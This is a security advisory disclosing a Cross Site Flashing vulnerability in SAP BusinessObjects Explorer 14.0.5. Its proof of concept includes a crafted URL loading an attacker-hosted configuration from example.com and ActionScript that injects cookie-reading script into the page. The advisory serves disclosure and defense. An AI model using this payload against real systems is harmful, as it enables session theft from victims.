SAP BusinessObjects Explorer 14.0.5 Cross Site Flashing

`#######################################################################  
#  
# COMPASS SECURITY ADVISORY  
# http://www.csnc.ch/en/downloads/advisories.html  
#  
#######################################################################  
#  
# Product: BusinessObjects Explorer  
# Vendor: SAP AG  
# Subject: Cross Site Flashing  
# Risk: High  
# Effect: Remotely exploitable  
# Author: Stefan Horlacher  
# Date: 2014-10-10  
# SAP Security Note: 1908647 [0]  
#  
#######################################################################  
  
Abstract:  
-------------  
BusinessObjects Explorer is vulnerable against Cross Site Flashing [1]  
attacks, allowing an attacker to e.g. steal the victim's session.  
This vulnerability requires the victim to click on a malicious link  
prepared by the attacker.  
  
  
Affected:  
---------  
Vulnerable:  
SAP BusinessObjects Explorer version 14.0.5 (build 882)  
  
Not tested:  
Other versions of BusinessObjects Explorer  
  
  
Technical Description:  
----------------------  
The Flash file suffers from a Cross Site Flashing vulnerability. It  
is possible to directly load and display the  
com_businessobjects_polestar_bootstrap.swf Flash file and specify a   
configUrl. This requires the victim to be logged and the attacker needs  
to know the /webres/ URL, which is known as soon as the attacker is in   
possession of valid credentials. The configuration file specified in   
the configURL parameter may reside on a foreign host. The   
configuration file itself may contain URLs of further Flash files   
residing on a foreign domain. If successful, the victim loads foreign   
Flash files, which leads to Cross Site Flashing. The example below   
loads a Flash file, which injects JavaScript into the DOM of the   
originating domain.  
  
  
URL: /explorer/webres/[CUT BY COMPASS]/com_businessobjects_polestar_bootstrap.swf?configUrl=http://example.com/attacker_flash_config.xml  
  
  
Code of the injected Flash file referenced in http://example.com/attacker_flash_config.xml  
package  
{  
import flash.display.Sprite;  
import flash.events.Event;  
import flash.external.ExternalInterface;  
  
public class Main extends Sprite  
{  
public function Main():void  
{  
ExternalInterface.call("document.write",  
"<script>alert(document.cookie)</script>");  
}  
}  
}  
  
Extract of the manipulated configuration file http://example.com/attacker_flash_config.xml:  
<p:configuration xmlns:p="http://www.businessobjects.com/2007/platform"  
p:codebase="plugins/">  
<p:splashLocation p:id="com_businessobjects_polestar_splashscreen"  
p:codebase="http://[CUT BY COMPASS].csnc.ch/[CUT BY COMPASS]/"/>  
<p:bundles>  
<p:bundle p:id="com_businessobjects_polestar_admin" p:codebase="http://example.com/"/>  
<p:bundle p:id="com_businessobjects_polestar_prompts" p:codebase="http://example.com/"/>  
<p:bundle p:id="com_businessobjects_polestar_dataprovider_xl" p:codebase="http://example.com/"/>  
<p:bundle p:id="com_businessobjects_polestar_portal_logoff" p:codebase="http://example.com/"/>  
[CUT BY COMPASS]  
  
  
Timeline:  
---------  
2013-06-06: Discovery by Stefan Horlacher  
2013-06-26: Initial vendor notification  
2013-12-10: Vendor releases patch and SAP Security Note 1908647  
2014-10-10: Disclosure of the advisory  
  
  
References:  
-----------  
[0] https://service.sap.com/sap/support/notes/1908647  
[1] https://www.owasp.org/index.php/Category:OWASP_Flash_Security_Project  
`